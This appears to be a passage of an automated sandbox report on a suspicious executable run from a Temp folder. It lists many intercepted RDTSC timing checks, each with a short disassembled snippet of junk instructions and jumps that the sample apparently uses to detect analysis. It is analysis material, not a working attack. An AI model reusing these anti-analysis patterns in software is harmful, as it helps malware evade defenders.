Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8A3755 second address: 8A376F instructions: 0x00000000 rdtsc 0x00000002 jl 00007FBF8C4F2A4Ch 0x00000008 jp 00007FBF8C4F2A46h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 jnp 00007FBF8C4F2A46h 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8A376F second address: 8A3781 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FBF8C4F2086h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jp 00007FBF8C4F2086h 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 89226F second address: 8922B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F2A4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a push eax 0x0000000b push esi 0x0000000c pushad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f jmp 00007FBF8C4F2A56h 0x00000014 popad 0x00000015 pop esi 0x00000016 mov eax, dword ptr [esp+04h] 0x0000001a push ecx 0x0000001b pushad 0x0000001c jnl 00007FBF8C4F2A46h 0x00000022 pushad 0x00000023 popad 0x00000024 popad 0x00000025 pop ecx 0x00000026 mov eax, dword ptr [eax] 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8922B4 second address: 8922BE instructions: 0x00000000 rdtsc 0x00000002 jng 00007FBF8C4F2086h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8922BE second address: 8922F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F2A4Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d pushad 0x0000000e push esi 0x0000000f jmp 00007FBF8C4F2A54h 0x00000014 pop esi 0x00000015 js 00007FBF8C4F2A4Ch 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8923E7 second address: 89241A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F2093h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FBF8C4F2099h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 89241A second address: 89243F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push eax 0x0000000a push edi 0x0000000b add dword ptr [ebp+122D1A31h], eax 0x00000011 pop ecx 0x00000012 pop edi 0x00000013 lea eax, dword ptr [ebp+12485C62h] 0x00000019 mov cl, 62h 0x0000001b push eax 0x0000001c push edi 0x0000001d push eax 0x0000001e push edx 0x0000001f jo 00007FBF8C4F2A46h 0x00000025 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 89243F second address: 879CF3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007FBF8C4F2088h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 0000001Ah 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 mov dword ptr [ebp+122D1BFDh], ecx 0x0000002a call dword ptr [ebp+122D1C6Fh] 0x00000030 pushad 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 879CF3 second address: 879CF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 879CF7 second address: 879D15 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FBF8C4F2086h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push esi 0x0000000e pop esi 0x0000000f jns 00007FBF8C4F2086h 0x00000015 popad 0x00000016 jl 00007FBF8C4F208Ch 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8CDB99 second address: 8CDB9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8CDD06 second address: 8CDD0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8CDD0A second address: 8CDD10 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8CDD10 second address: 8CDD1D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jng 00007FBF8C4F2086h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8CDD1D second address: 8CDD3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FBF8C4F2A4Fh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8CDD3A second address: 8CDD3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8CDD3E second address: 8CDD51 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FBF8C4F2A46h 0x00000008 ja 00007FBF8C4F2A46h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8CDE9D second address: 8CDEB9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F2098h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8CE11B second address: 8CE126 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FBF8C4F2A46h 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8CE126 second address: 8CE13F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007FBF8C4F2093h 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8CE409 second address: 8CE40D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8CE40D second address: 8CE411 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8CE411 second address: 8CE417 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8CE417 second address: 8CE41F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8D4461 second address: 8D4479 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBF8C4F2A53h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8D4479 second address: 8D447F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8D447F second address: 8D44B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FBF8C4F2A46h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push ebx 0x0000000f pushad 0x00000010 popad 0x00000011 pop ebx 0x00000012 push edx 0x00000013 jng 00007FBF8C4F2A46h 0x00000019 jmp 00007FBF8C4F2A4Ch 0x0000001e pop edx 0x0000001f jbe 00007FBF8C4F2A52h 0x00000025 jp 00007FBF8C4F2A46h 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8D2E79 second address: 8D2E8B instructions: 0x00000000 rdtsc 0x00000002 jng 00007FBF8C4F2086h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c js 00007FBF8C4F2086h 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8D2E8B second address: 8D2EA3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F2A4Bh 0x00000007 jns 00007FBF8C4F2A46h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8D313B second address: 8D3158 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF8C4F2099h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8D3158 second address: 8D3166 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007FBF8C4F2A5Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8D366C second address: 8D368F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pop edx 0x00000005 jng 00007FBF8C4F2086h 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FBF8C4F208Bh 0x00000015 jl 00007FBF8C4F2088h 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8D3801 second address: 8D3831 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF8C4F2A57h 0x00000009 popad 0x0000000a jmp 00007FBF8C4F2A4Ah 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jno 00007FBF8C4F2A46h 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8D3831 second address: 8D384A instructions: 0x00000000 rdtsc 0x00000002 jne 00007FBF8C4F2086h 0x00000008 jmp 00007FBF8C4F208Bh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8D384A second address: 8D384E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8D384E second address: 8D3854 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8D3854 second address: 8D385A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8D385A second address: 8D3864 instructions: 0x00000000 rdtsc 0x00000002 js 00007FBF8C4F2092h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8D3864 second address: 8D386A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8D3E26 second address: 8D3E30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FBF8C4F2086h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8D3E30 second address: 8D3E34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8D3E34 second address: 8D3E50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FBF8C4F2086h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d jmp 00007FBF8C4F208Dh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8D42E2 second address: 8D42E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8D42E6 second address: 8D42F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007FBF8C4F2086h 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8D42F6 second address: 8D42FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8D2B8F second address: 8D2B9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FBF8C4F2086h 0x0000000a jl 00007FBF8C4F2086h 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8D2B9F second address: 8D2BB9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F2A53h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8D92ED second address: 8D931C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F2096h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c jc 00007FBF8C4F2086h 0x00000012 pop esi 0x00000013 jmp 00007FBF8C4F208Bh 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8D931C second address: 8D9322 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8D9322 second address: 8D9326 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8D975F second address: 8D9763 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8D8CA4 second address: 8D8CB2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F208Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8D9B6A second address: 8D9B70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8D9B70 second address: 8D9B74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8D9B74 second address: 8D9B7E instructions: 0x00000000 rdtsc 0x00000002 jns 00007FBF8C4F2A46h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8D9D09 second address: 8D9D5C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBF8C4F2097h 0x00000008 jng 00007FBF8C4F2086h 0x0000000e jmp 00007FBF8C4F2096h 0x00000013 popad 0x00000014 jmp 00007FBF8C4F2091h 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push ebx 0x0000001c push eax 0x0000001d push edx 0x0000001e jbe 00007FBF8C4F2086h 0x00000024 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8DD0B6 second address: 8DD0BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8DD0BA second address: 8DD0C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8DE8C1 second address: 8DE8DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF8C4F2A4Dh 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c jbe 00007FBF8C4F2A60h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 849125 second address: 84912B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 84912B second address: 849141 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jg 00007FBF8C4F2A46h 0x0000000e ja 00007FBF8C4F2A46h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 849141 second address: 849148 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 849148 second address: 849158 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FBF8C4F2A46h 0x0000000a jns 00007FBF8C4F2A46h 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 849158 second address: 849184 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FBF8C4F2092h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FBF8C4F2092h 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8E1478 second address: 8E149D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jng 00007FBF8C4F2A46h 0x00000009 jmp 00007FBF8C4F2A57h 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8E2F14 second address: 8E2F27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBF8C4F208Fh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 84772D second address: 847762 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F2A59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007FBF8C4F2A4Ah 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FBF8C4F2A4Ah 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 847762 second address: 847766 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 847766 second address: 84776A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8EA655 second address: 8EA65E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8E8FD0 second address: 8E8FEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jng 00007FBF8C4F2A48h 0x0000000b pop edx 0x0000000c jnp 00007FBF8C4F2A62h 0x00000012 push eax 0x00000013 push edx 0x00000014 jp 00007FBF8C4F2A46h 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8E8FEC second address: 8E8FF5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8E9456 second address: 8E945D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8E945D second address: 8E946F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FBF8C4F2086h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 891DB6 second address: 891E10 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FBF8C4F2A56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d mov ecx, eax 0x0000000f push 00000004h 0x00000011 push 00000000h 0x00000013 push ebx 0x00000014 call 00007FBF8C4F2A48h 0x00000019 pop ebx 0x0000001a mov dword ptr [esp+04h], ebx 0x0000001e add dword ptr [esp+04h], 00000019h 0x00000026 inc ebx 0x00000027 push ebx 0x00000028 ret 0x00000029 pop ebx 0x0000002a ret 0x0000002b mov edx, dword ptr [ebp+122D2C0Fh] 0x00000031 nop 0x00000032 pushad 0x00000033 jnl 00007FBF8C4F2A48h 0x00000039 push eax 0x0000003a push edx 0x0000003b ja 00007FBF8C4F2A46h 0x00000041 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 891E10 second address: 891E32 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007FBF8C4F2094h 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 891E32 second address: 891E3C instructions: 0x00000000 rdtsc 0x00000002 jc 00007FBF8C4F2A4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8E9943 second address: 8E994D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8E994D second address: 8E9975 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FBF8C4F2A4Ch 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e jmp 00007FBF8C4F2A51h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8EA39D second address: 8EA3A7 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FBF8C4F2086h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8EA3A7 second address: 8EA3AE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8ECE7E second address: 8ECE84 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
